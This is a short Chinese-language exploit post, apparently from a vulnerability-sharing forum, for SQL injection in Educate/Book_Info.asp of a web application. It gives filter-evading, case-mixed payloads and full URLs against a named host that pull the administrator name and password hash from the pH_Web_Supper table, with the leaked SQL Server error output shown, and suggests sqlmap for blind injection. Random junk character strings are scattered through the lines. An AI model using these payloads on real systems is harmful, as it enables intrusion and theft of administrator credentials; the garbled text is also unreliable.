漏洞出现在Educate/Book_Info.asp$ @ t9 ]+ w1 \0 a: ^
此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出* ~# B1 S) s$ b
exp:如下( R4 |+ @* Z+ \6 z" z& c+ x
查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
! R# a) Z6 O9 @0 ~查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
" I5 ~0 e/ @/ O- j, e+ ]http://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)! c M/ S( ^1 a
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'$ A1 k" a/ ~$ s( p( p+ ]
将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。
; ]; J- q& l- E. c. Y& A/Educate/Book_Info.asp,行 82 O+ X. Y4 k6 L; W
http://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)7 a, N% P4 A6 j' G2 [
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'& h0 c: K7 M7 M9 q3 ?0 h. h) Z
将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。
) S0 H4 `. f9 c. v' }$ t5 k/Educate/Book_Info.asp,行 8 |